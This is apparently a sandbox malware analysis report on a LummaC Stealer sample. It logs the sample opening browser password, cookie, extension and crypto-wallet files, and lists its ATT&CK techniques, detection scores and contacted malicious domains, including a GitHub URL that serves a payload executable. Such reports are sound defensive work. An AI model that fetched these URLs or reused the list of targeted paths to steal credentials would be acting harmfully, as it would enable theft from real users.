Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Lipras\pdf.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior

Source: Yara match

File source: Process Memory Space: pdf.exe PID: 7980, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	231 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	5%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Lipras\pdf.exe	100%	Avira	HEUR/AGEN.1314134
C:\Lipras\pdf.exe	100%	Joe Sandbox ML
C:\Lipras\pdf.exe	59%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.121.4	true	false	unknown
raw.githubusercontent.com	185.199.109.133	true	false	unknown
seallysl.site	172.67.180.76	true	true	unknown
ponintnykqwm.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
contemteny.site	true	unknown
opposezmny.site	true	unknown
servicedny.site	true	unknown
https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe	false	unknown
goalyfeastz.site	true	unknown
https://raw.githubusercontent.com/vonuch1/start/refs/heads/main/khtoawdltrha.exe	false	unknown
authorisev.site	true	unknown
faulteyotk.site	true	unknown
ponintnykqwm.shop	true	unknown
seallysl.site	true	unknown
https://seallysl.site/api	true	unknown
dilemmadu.site	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/e	pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com	file.exe, 00000000.00000002.4141670945.0000000002380000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.4141670945.0000000002377000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.enigmaprotector.com/openU	pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/apiH	pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
